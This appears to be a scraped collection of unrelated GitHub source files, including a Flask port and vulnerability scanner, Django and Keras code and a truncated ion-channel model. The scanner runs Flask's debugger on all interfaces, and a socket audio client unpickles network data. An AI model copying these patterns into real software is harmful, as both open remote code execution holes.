return render_template('index.html')\n\n@app.route('/scan', methods=['POST'])\ndef scan():\n target_ip = request.form['target_ip']\n website_url = request.form['website_url']\n software_version = request.form['software_version']\n port_option = request.form['port_option']\n\n open_ports = None # Default value\n\n if port_option == 'specific_ports':\n ports_to_scan = [int(port) for port in request.form['ports'].split(',')]\n open_ports = scan_ports(target_ip, ports_to_scan)\n nmap_result = None\n else:\n nmap_result = run_nmap_scan(target_ip)\n\n # Perform vulnerability assessment\n clickjacking_status = check_clickjacking_vulnerability(website_url)\n sql_injection_status = check_sql_injection(website_url)\n patch_status = check_patch_status(software_version)\n\n # Store relevant information in session to pass to /patch\n patch_info = {\n 'patch_result': patch_status,\n 'current_version': software_version,\n 'updated_version': '2.0', # Assuming the updated version for simplicity\n 'update_message': 'Update available! Latest version: 2.0',\n 'update_icon': 'exclamation-triangle'\n }\n session['patch_info'] = patch_info\n return render_template('result.html', clickjacking_status=clickjacking_status,\n sql_injection_status=sql_injection_status, nmap_result=nmap_result,\n open_ports=open_ports)\n # return redirect(url_for('patch'))\n\n\n@app.route('/patch')\ndef patch():\n # Retrieve the patch result, current_version, and updated_version from the session\n patch_info = session.get('patch_info', {})\n patch_result = patch_info.get('patch_result', '')\n current_version = patch_info.get('current_version', '')\n updated_version = patch_info.get('updated_version', '')\n update_message = patch_info.get('update_message', '')\n update_icon = patch_info.get('update_icon', '')\n \n # Render the patch_result.html template with the patch result and version information\n return render_template('patch.html', patch_result=patch_result, current_version=current_version,\n updated_version=updated_version, update_message=update_message, update_icon=update_icon)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, debug=True)","repo_name":"Uusa4303/Vulnerabilityassessment-patchmanagement","sub_path":"Web app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74098318346","text":"import logging\nimport os\n\nfrom nose.plugins import Plugin\n\nfrom nose_blame.blame import BlameList\n\nclass BlamePlugin(Plugin):\n enabled = False\n name = 'blame'\n score = 0\n\n def options(self, parser, env=os.environ):\n super(BlamePlugin, self).options(parser, env=env)\n\n env_opt = 'NOSE_BLAME_FILE'\n parser.add_option('--blame-file', action='store', type='string',\n dest='blame_file', default=env.get(env_opt, None),\n help='Path that blame json file will be written to.')\n\n\n def configure(self, options, conf):\n super(BlamePlugin, self).configure(options, conf)\n self.conf = conf\n\n if not self.enabled or not self.can_configure: return\n self.blame_file = getattr(options, 'blame_file', None)\n\n def begin(self):\n self.blame_list = BlameList()\n\n def handleError(self, test, err):\n case_owners = getattr(test.test, 'case_owners', [])\n suite_owners = getattr(test.test, 'suite_owners', [])\n self.blame_list.add_error(test.id(), err, case_owners=case_owners, suite_owners=suite_owners)\n\n def handleFailure(self, test, err):\n case_owners = getattr(test.test, 'case_owners', [])\n suite_owners = getattr(test.test, 'suite_owners', [])\n self.blame_list.add_failure(test.id(), err, case_owners=case_owners, suite_owners=suite_owners)\n\n def finalize(self, result):\n if self.blame_file:\n fd = open(self.blame_file, 'w')\n fd.write(self.blame_list.write_json())\n fd.close()\n else:\n print(self.blame_list.write_json(indent=2, sort_keys=True))\n return None\n","repo_name":"pubnub/nose-blame","sub_path":"src/nose_blame/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30190738354","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass MonitorRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, ticker: str=None, event_type: str=None): # noqa: E501\n \"\"\"MonitorRequest - a model defined in Swagger\n\n :param ticker: The ticker of this MonitorRequest. # noqa: E501\n :type ticker: str\n :param event_type: The event_type of this MonitorRequest. # noqa: E501\n :type event_type: str\n \"\"\"\n self.swagger_types = {\n 'ticker': str,\n 'event_type': str\n }\n\n self.attribute_map = {\n 'ticker': 'ticker',\n 'event_type': 'eventType'\n }\n self._ticker = ticker\n self._event_type = event_type\n\n @classmethod\n def from_dict(cls, dikt) -> 'MonitorRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The MonitorRequest of this MonitorRequest. # noqa: E501\n :rtype: MonitorRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def ticker(self) -> str:\n \"\"\"Gets the ticker of this MonitorRequest.\n\n\n :return: The ticker of this MonitorRequest.\n :rtype: str\n \"\"\"\n return self._ticker\n\n @ticker.setter\n def ticker(self, ticker: str):\n \"\"\"Sets the ticker of this MonitorRequest.\n\n\n :param ticker: The ticker of this MonitorRequest.\n :type ticker: str\n \"\"\"\n if ticker is None:\n raise ValueError(\"Invalid value for `ticker`, must not be `None`\") # noqa: E501\n\n self._ticker = ticker\n\n @property\n def event_type(self) -> str:\n \"\"\"Gets the event_type of this MonitorRequest.\n\n\n :return: The event_type of this MonitorRequest.\n :rtype: str\n \"\"\"\n return self._event_type\n\n @event_type.setter\n def event_type(self, event_type: str):\n \"\"\"Sets the event_type of this MonitorRequest.\n\n\n :param event_type: The event_type of this MonitorRequest.\n :type event_type: str\n \"\"\"\n allowed_values = [\"downCross50MA\", \"upCross50MA\", \"downCross100MA\", \"upCross100MA\", \"downCross10MA\", \"upCross10MA\", \"downCross200MA\", \"upCross200MA\"] # noqa: E501\n if event_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `event_type` ({0}), must be one of {1}\"\n .format(event_type, allowed_values)\n )\n\n self._event_type = event_type\n","repo_name":"qianzhang-dev/AutoTrader","sub_path":"srv/swagger_server/models/monitor_request.py","file_name":"monitor_request.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41480033437","text":"\"\"\"\nA maximally simple solution to CT / CTA detection!\n\"\"\"\n\nimport logging\nimport os\n\nimport keras\nimport matplotlib\nimport numpy as np\nfrom keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\nfrom keras.models import Sequential, model_from_json\nfrom skimage.transform import downscale_local_mean\n\nmatplotlib.use('Agg')\n# noinspection PyPep8\nimport matplotlib.pyplot as plt\n\n\n# noinspection PyMethodMayBeStatic,PyMethodMayBeStatic,PyMethodMayBeStatic\nclass Algorithm(object):\n \"\"\" This contains the details of our solution, intended to be largely\n isolated from other infra-structure issues. \"\"\"\n\n def __init__(self, cache_dir=None):\n \"\"\" Optionally pass a directory (full path) which the algorithm can use\n for caching results (e.g. preprocessing) between invocations.\"\"\"\n self.history = None # Will keep a plot of accuracy by epoch\n self.cache_dir = cache_dir\n self.preprocessing_cache_dir = None\n if cache_dir:\n self.preprocessing_cache_dir = os.path.join(cache_dir, 'preprocessing')\n os.makedirs(self.preprocessing_cache_dir, exist_ok=True)\n\n # Class level constants\n downsample_factor = (4, 4)\n imshape = tuple(512 // dsf for dsf in downsample_factor) # e.g. (128, 128)\n\n def _preprocess_one_dicom(self, dcm):\n \"\"\" Return a nicely normalised numpy float32 image \"\"\"\n raw_image = dcm.pixel_array\n\n # print(raw_image.dtype)\n slope = dcm.data_element('RescaleSlope').value\n intercept = dcm.data_element('RescaleIntercept').value\n\n image = np.array(raw_image, dtype=np.float32)\n image = image * slope + intercept\n image = np.array(image, dtype=np.float32)\n\n # It seems that padding value lies! So we'll just clamp image values and hope for the best!\n # logging.debug(\"Image (min,max) = (%6.1f, %6.1f)\", np.min(image), np.max(image))\n clip_min = -200.0\n clip_max = 1000.0\n image[image < clip_min] = clip_min\n image[image > clip_max] = clip_max\n\n assert np.min(image) >= clip_min\n assert np.max(image) <= clip_max\n\n # Finally, downscale !\n\n image = downscale_local_mean(image, Algorithm.downsample_factor)\n\n return image\n\n def preprocessed_images(self, cohort):\n \"\"\" Apply preprocessing - mainly conversion to HU \"\"\"\n\n def cached_preprocess_one_dicom(ix):\n if not self.preprocessing_cache_dir:\n # If we have no cache, have to compute and be done.\n return self._preprocess_one_dicom(cohort.dicoms[ix])\n\n id_ = cohort.ids[ix]\n cached_file_name = os.path.join(self.preprocessing_cache_dir, id_ + '.npy')\n if os.path.exists(cached_file_name):\n logging.info(\"Using preprocessing cache...\")\n image = np.load(cached_file_name)\n else:\n logging.info(\"Preprocessing...\")\n image = self._preprocess_one_dicom(cohort.dicoms[ix])\n np.save(cached_file_name, image)\n return image\n\n # Trick to ensure we only show a logging message once.\n dup_filter = DuplicateFilter()\n logging.getLogger().addFilter(dup_filter)\n result = [cached_preprocess_one_dicom(ix) for ix in range(cohort.size)]\n logging.getLogger().removeFilter(dup_filter)\n return result\n\n def train(self, cohort):\n \"\"\" Train on the given training cohort (already split from test)\n This includes pre-processing. Return the trained model\"\"\"\n\n # Preprocess - two phases a) -> HU, b) reshape and scale.\n x_data = self.data_scaling(self.preprocessed_images(cohort))\n y_data = keras.utils.to_categorical(cohort.groundtruth, 2)\n\n # Build the model\n model = self.build_model()\n model.compile(\n loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adam(),\n metrics=['accuracy'])\n self.history = AccuracyHistory()\n\n # Train and save the model\n model.fit(\n x_data, y_data,\n batch_size=20, shuffle=True, epochs=15, verbose=0,\n validation_split=0.2, callbacks=[self.history])\n\n model.summary(print_fn=logging.debug)\n\n return model\n\n def predict(self, model, cohort):\n # Preprocess\n x_data = self.data_scaling(self.preprocessed_images(cohort))\n\n # Run the model\n predictions = model.predict_classes(x_data)\n\n return predictions\n\n def data_scaling(self, images):\n \"\"\"\n Given a list of pre-processed images (e.g. from PreprocessedCohort.images) perform\n intensity scaling and reshaping, returning a 4D tensor (n, x, y, 1) ready for feeding\n to a network\n \"\"\"\n siz = images[0].shape\n x_data = np.array(images).reshape(-1, siz[0], siz[1], 1)\n x_data = x_data.astype(np.float32)\n x_data = (x_data + 100) / 150.0\n # mean, sd = np.mean(x_data), np.std(x_data)\n # min_, max_ = np.min(x_data), np.max(x_data)\n # print(\"data_scaling: shape:\", x_data.shape, \"min,max:\",\n # (min_, max_), \"mean,sd:\", (mean, sd))\n\n return x_data\n\n def build_model(self):\n input_shape = Algorithm.imshape + (1,) # e.g. (128, 128, 1)\n model = Sequential()\n model.add(Conv2D(8, kernel_size=(3, 3), strides=(1, 1), activation='relu',\n input_shape=input_shape))\n model.add(MaxPooling2D(pool_size=(3, 3)))\n model.add(Conv2D(8, (3, 3), strides=(1, 1), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Flatten())\n model.add(Dense(10, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(2, activation='softmax'))\n\n return model\n\n @staticmethod\n def save_model(model, fname):\n \"\"\" Save model and wieghts to fname and fname.h5 files respectively\n fname can include a directory which will be created if it doesn't exist\"\"\"\n\n directory = os.path.dirname(fname)\n if directory and not os.path.isdir(directory):\n logging.warning(\"Creating directory %s\" % directory)\n os.makedirs(directory)\n\n model_json = model.to_json()\n with open(fname + '.json', 'w') as json_file:\n json_file.write(model_json)\n model.save_weights(fname + '.h5')\n logging.info(\"Model saved to %s[.json,.h5] files\", fname)\n\n @staticmethod\n def load_model(fname):\n \"\"\" Load a model from fname.json and fname.h5, and return it.\n (Note that the loaded model must be compiled before use)\"\"\"\n # load json and create model\n json_file = open(fname + '.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n loaded_model.load_weights(fname + '.h5')\n print(\"Loaded model from %s[.json,.h5] files\" % fname)\n return loaded_model\n\n\nclass AccuracyHistory(keras.callbacks.Callback):\n \"\"\" Record and plot training progress \"\"\"\n\n def __init__(self):\n super().__init__()\n self.acc = []\n self.val_acc = []\n\n def on_train_begin(self, logs=None):\n self.acc = []\n self.val_acc = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.acc.append(logs.get('acc'))\n self.val_acc.append(logs.get('val_acc'))\n\n def plot_training(self, save_file_path):\n epochs = range(1, len(self.acc) + 1)\n plt.figure()\n plt.plot(epochs, self.acc, label='Train')\n plt.plot(epochs, self.val_acc, label='Validation')\n plt.ylim(0.0, 1.0)\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n\n if save_file_path is not None:\n _, extension = os.path.splitext(save_file_path)\n assert extension in ('.png', '.jpeg')\n plt.savefig(save_file_path)\n plt.show()\n else:\n plt.show()\n\n\nclass DuplicateFilter(object):\n \"\"\" A logging filter to remove duplicates. (Used in preprocessing method)\"\"\"\n\n def __init__(self):\n self.msgs = set()\n\n def filter(self, record):\n rv = record.msg not in self.msgs\n self.msgs.add(record.msg)\n return rv\n","repo_name":"danielphil/kaggle_ctmi","sub_path":"kaggle_ctmi/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":8373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"42501765547","text":"import os\nimport pyaudio\nimport wave\nimport socket\nimport time\nimport pickle \n\nCHUNK = 1024\nCHANNELS = 2\nFORMAT = pyaudio.paInt16\nRATE = 44100\n\n\ndef playback_data(data, p):\n \n input('Press enter >> ')\n\n stream = p.open(format=p.get_format_from_width(data.getsampwidth()),\n channels=data.getnchannels(),\n rate=data.getframerate(),\n output=True)\n\n audio = data.readframes(CHUNK)\n\n while audio != '':\n stream.write(audio)\n audio = data.readframes(CHUNK)\n if len(audio) <= 0:\n break\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n data.close()\n print('Complete!')\n print('Reconnecting to server.')\n time.sleep(2)\n\n\n\n\n\n\ndef main():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(('10.42.0.24', 2348))\n\n while True:\n\n full_msg = b''\n new_msg = True\n\n while True:\n msg = s.recv(1024)\n if new_msg:\n print('Received:',msg[:CHUNK])\n msglen = int(msg[:CHUNK])\n new_msg = False\n\n full_msg += msg\n\n print(len(full_msg))\n\n if len(full_msg)-CHUNK == msglen:\n print('Received audio.')\n print(full_msg[CHUNK:])\n data = pickle.loads(full_msg[CHUNK:])\n data = list(data.values())\n data = b''.join(data)\n p = pyaudio.PyAudio()\n os.system('clear')\n wf = wave.open('data.wav', 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(data)\n wf.close()\n\n\n FILE = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data.wav')\n\n data = wave.open(FILE, 'rb')\n playback_data(data, p)\n \n new_msg = True\n full_msg = b\"\"\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"ZodinDevelopment/AudioHive","sub_path":"Playback_Client/basic_cli_wire.py","file_name":"basic_cli_wire.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12977076058","text":"from django.urls import path,include\nfrom . import views\n\napp_name=\"administration\"\n\nurlpatterns=[\n path(\"AccessDenied/\",views.AccessDenied,name=\"AccessDenied\"),\n path(\"\",views.index,name=\"index\"),\n path(\"verify_sellers/\",views.verify_sellers,name=\"verify_sellers\"),\n]\n","repo_name":"KeepCoding365days/TechMaze","sub_path":"administration/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20041892999","text":"from rest_framework import status, viewsets, permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom api.models import Author\nfrom api.serializers import AuthorSerializer\nfrom api.utils import methods, author_not_found\nfrom api.paginaion import CustomPagiantor\nfrom api.utils import invalid_user_view\n\nfrom django.shortcuts import redirect, render\n\n\n\"\"\" put request data into instance \nexample of an working data:\n\n{\n \"displayName\": \"the name\",\n \"github\": \"https://uofa-cmput404.github.io/\"\n}\n\n\"\"\"\ndef all_authors_view(request):\n # Check the user is invalid in view\n if invalid_user_view(request):\n return redirect(\"login\")\n\n content = {}\n content['all_authors'] = True\n\n return render(request, \"all_authors.html\", content)\n\n\nclass AuthorsViewSet(viewsets.GenericViewSet):\n\n permission_classes = [permissions.IsAuthenticated]\n\n \"\"\"\n URL: api/authors/\n GET: retrieve all profiles on the server paginated\n \"\"\"\n @action(methods=[methods.GET], detail=True)\n def list_all(self, request):\n\n queryset = Author.objects.all()\n pagination = CustomPagiantor()\n qs = pagination.paginate_queryset(queryset, request)\n serializer = AuthorSerializer(qs, many=True)\n res = {\n \"type\": \"authors\",\n \"items\": serializer.data\n }\n return Response(res, status=status.HTTP_200_OK)\n \n # Return the total number of authors\n @action(methods=[methods.GET], detail=True)\n def get_num_of_authors(self, request):\n total = Author.objects.all().count()\n res = {\"total_item\": total}\n return Response(res, status=status.HTTP_200_OK)\n\n\nclass ProfileViewSet(viewsets.ViewSet):\n\n permission_classes = [permissions.IsAuthenticated]\n\n \"\"\"\n URL: api/author/{authorID}/\n GET: retrieve their profile\n POST: update profile\n \"\"\"\n @action(methods=[methods.GET], detail=True)\n def retrieve(self, request, authorID):\n if author_not_found(authorID):\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n author = Author.objects.get(authorID=authorID)\n serializer = AuthorSerializer(author)\n return Response(serializer.data)\n\n @action(methods=[methods.POST], detail=True)\n def update(self, request, authorID):\n if author_not_found(authorID):\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = AuthorSerializer(data=request.data)\n if serializer.is_valid():\n instance = Author.objects.get(authorID=authorID)\n self.populate_author_data(serializer.data, instance)\n return Response(AuthorSerializer(instance).data, status=status.HTTP_200_OK)\n else:\n # return 400 response if the data was invalid/missing require field\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n def populate_author_data(self, data, instance):\n instance.displayName = data[\"displayName\"]\n instance.github = data[\"github\"]\n instance.save()\n","repo_name":"GraceFu/CMPUT404-F21-Project","sub_path":"api/views/authors.py","file_name":"authors.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25833401128","text":"from tkinter import*\r\nventana=Tk()\r\nventana.title(\"BLOQUES DE COLOR\")\r\nventana.geometry(\"350x350\")\r\n\r\nglobal r,c\r\nr=2\r\nc=3\r\n\r\ndef mtx():\r\n global r,c\r\n\r\n for x in [1,2,3,4,5]:\r\n for y in [0,1,2,3,4]:\r\n\r\n A=Button(ventana, text=\" \", bg=\"gray\", height=2, width=4)\r\n A.grid(column=x, row=y)\r\n\r\n\r\n S=Button(ventana, text=\"S\", bg=\"red\", height=2, width=4)\r\n S.grid(column=c, row=r)\r\n\r\ndef izquierda():\r\n global c\r\n if (c==1):\r\n c=5\r\n else:\r\n c=c-1\r\n mtx()\r\n \r\ndef arriba():\r\n global r\r\n if (r==0):\r\n r=4\r\n else:\r\n r=r-1\r\n mtx()\r\n \r\ndef abajo():\r\n global r\r\n if (r==4):\r\n r=0\r\n else:\r\n r=r+1\r\n mtx()\r\n \r\ndef derecha():\r\n global c\r\n if (c==5):\r\n c=1\r\n else:\r\n c=c+1\r\n mtx()\r\n\r\n\r\nIzq=Button(ventana, text=\"🢀\", bg=\"green\", height=2, width=4, command=izquierda)\r\nIzq.grid(column=6, row=0)\r\n\r\nAr=Button(ventana, text=\"🢁\", bg=\"orange\", height=2, width=4, command=arriba)\r\nAr.grid(column=8, row=0)\r\n\r\nAb=Button(ventana, text=\"🢃\", bg=\"yellow\", height=2, width=4, command=abajo)\r\nAb.grid(column=7, row=0)\r\n\r\nDer=Button(ventana, text=\"🢂\", bg=\"brown\", height=2, width=4, command=derecha)\r\nDer.grid(column=9, row=0)\r\nmtx()\r\n\r\nventana.mainloop()\r\n\r\n","repo_name":"GARS23-s/JUEGO-DEL-BLOQUE","sub_path":"BLOQUES DE COLORES P2.py","file_name":"BLOQUES DE COLORES P2.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20066027508","text":"from collections import namedtuple\nfrom typing import NamedTuple\n\nFold = namedtuple('Fold', 'axis loc')\nDot = namedtuple('Dot', 'x y')\n\n#file_to_use = 'day13/day13-sample.txt'\nfile_to_use = 'day13/day13-input.txt'\n\ngrid = set()\nfolds = []\n\nwith open(file_to_use) as f:\n l = f.readline().strip()\n while l != '':\n x, y = l.split(',')\n grid.add(Dot(int(x), int(y)))\n l = f.readline().strip()\n l = f.readline().strip()\n while l != '':\n axis,loc = l.split('=')\n folds.append(Fold(axis[-1], int(loc)))\n l = f.readline().strip()\n\n# for 13-1, we do one fold, for 13-2 we do all of them\nfor fold in folds:\n for dot in frozenset(grid):\n if fold.axis == 'x' and dot.x > fold.loc or fold.axis == 'y' and dot.y > fold.loc:\n grid.remove(dot)\n if fold.axis == 'x':\n grid.add(Dot((fold.loc - dot.x) + fold.loc, dot.y))\n if fold.axis == 'y':\n grid.add(Dot(dot.x, (fold.loc - dot.y) + fold.loc))\n\nfor y in range(10):\n line = [' ' for i in range(40)]\n for dot in filter(lambda x : x.y == y, grid):\n line[dot.x] = '*'\n print(''.join(line))","repo_name":"ChrisGwinn/adventofcode2021","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16770357944","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Attendance',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Meeting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ('date', models.DateTimeField(auto_now_add=True)),\n ('present', models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='attendance.Attendance')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='attendance',\n name='meeting',\n field=models.ForeignKey(to='attendance.Meeting'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='attendance',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='attendance',\n unique_together=set([('user', 'meeting')]),\n ),\n ]\n","repo_name":"siggame/auditor","sub_path":"auditor/attendance/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32653930923","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom forms import BooksForm, EditForm\nimport os\n\napp = Flask(__name__)\n# database object\nSECRET_KEY = os.urandom(32)\napp.config['SECRET_KEY'] = SECRET_KEY\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///books_database.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# open/create a cursor object\ndb = SQLAlchemy(app)\nBootstrap(app)\n\n\n# creating a class to handle tables in the DB\nclass Books(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(250), unique=True, nullable=False)\n author = db.Column(db.String(250), nullable=False)\n rating = db.Column(db.Float, nullable=False)\n\n def __repr__(self):\n return '' % self.title % self.author % self.rating\n\n\ndb.create_all()\n\n\n@app.route('/')\ndef home():\n # get the books from BOOKS object(database object)\n all_books = db.session.query(Books).all()\n return render_template('index.html', all_books=all_books)\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add():\n form = BooksForm()\n if form.validate_on_submit() and request.method == 'POST':\n # get the data from the form using \"data\" on form object\n new_book = Books(title=form.title.data, author=form.author.data, rating=form.rating.data)\n db.session.add(new_book)\n db.session.commit()\n return redirect(url_for('home'))\n return render_template('add.html', form=form)\n\n\n@app.route('/edit_rating/', methods=['GET', 'POST'])\ndef edit_rating():\n form = EditForm()\n if form.validate_on_submit() and request.method == \"POST\":\n book_id = request.args.get(\"edit_book_id\")\n update_book = Books.query.get(book_id)\n update_book.rating = request.form[\"rating\"]\n db.session.commit()\n return redirect(url_for(\"home\"))\n book_id = request.args.get(\"id\")\n book = Books.query.get(book_id)\n return render_template('edit_rating.html', edit_form=form)\n\n\n@app.route('/delete_book/', methods=['GET'])\ndef delete_book():\n book_id = request.args.get('del_book_id')\n del_book = Books.query.get(book_id)\n db.session.delete(del_book)\n db.session.commit()\n return redirect(url_for('home'))\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"rajverma1985/blog-with-users-start","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11359062409","text":"import sys\nimport math\nimport numpy as np\nimport pandas as pd\nimport argparse\nimport re\nimport os\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import minimize\nfrom dcpyps import dataset\nfrom dcpyps import mechanism\nfrom dcprogs.likelihood import Log10Likelihood\nfrom scalcs import scalcslib as scl\nfrom scalcs import scplotlib as scpl\n\n\n\ndef dcprogslik(x):\n mec.theta_unsqueeze(np.exp(x))\n mec.set_eff('c', 100e-9)\n return -likelihood(mec.Q) * logfac\n\ndef printiter(theta):\n global iternum\n iternum += 1\n lik = dcprogslik(theta)\n if iternum % 10 == 0:\n print(\"iteration # {0:d}; log-lik = {1:.6f}\".format(iternum, -lik))\n print(np.exp(theta))\n\ndef mechanism_RO(rates):\n\n o = mechanism.State('A', 'F*', 50e-12)\n r = mechanism.State('B', 'R', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[1], o, r, name='alpha', limits=[1e-15, 1e+7]),\n mechanism.Rate(rates[0], r, o, name='beta', limits=[1e-15, 1e+7]),\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CO', rtitle='CO_rates')\n complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_RFO(rates):\n\n o = mechanism.State('A', 'F*', 50e-12)\n f = mechanism.State('B', 'F', 0.0)\n r = mechanism.State('C', 'R', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[3], o, f, name='alpha', limits=[1e+0, 1.5e+4]),\n mechanism.Rate(rates[2], f, o, name='beta', limits=[1e+0, 1.5e+4]),\n mechanism.Rate(rates[1], f, r, name='gamma', limits=[1e+0, 1.5e+4]),\n mechanism.Rate(rates[0], r, f, name='delta', limits=[1e+0, 1.5e+4])\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFO', rtitle='CFO_rates')\n complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOODD(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n op = mechanism.State('A', 'A2Op', 50e-12)\n d = mechanism.State('C', 'A2D', 0.0)\n dp = mechanism.State('C', 'A2Dp', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[1], f, op, name='betap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], op, f, name='alphap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], f, c, name='gamma', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[6], f, d, name='d', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[7], f, dp, name='dp', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[8], d, f, name='r', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[9], dp, f, name='rp', limits=[1e0, 1.5e4])\n ]\n\n complete_mechanism = mechanism.Mechanism(rate_list, mtitle='CFOODD', rtitle='CFOODD_rates')\n # complete_mechanism.set_eff('c', 100e-9)\n\n return complete_mechanism\n\ndef mechanism_CFOOD(rates):\n\n c = mechanism.State('B', 'A2R', 0.0)\n f = mechanism.State('B', 'A2F', 0.0)\n o = mechanism.State('A', 'A2O', 50e-12)\n op = mechanism.State('A', 'A2Op', 50e-12)\n d = mechanism.State('C', 'A2D', 0.0)\n\n rate_list = [\n mechanism.Rate(rates[0], f, o, name='beta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[1], f, op, name='betap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[2], o, f, name='alpha', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[3], op, f, name='alphap', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[4], c, f, name='delta', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[5], f, c, name='gamma', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[6], f, d, name='d', limits=[1e0, 1.5e4]),\n mechanism.Rate(rates[7], d, f, name='r', limits=[1e0, 1.5e4]),\n ]\n\n complete_mechanism = 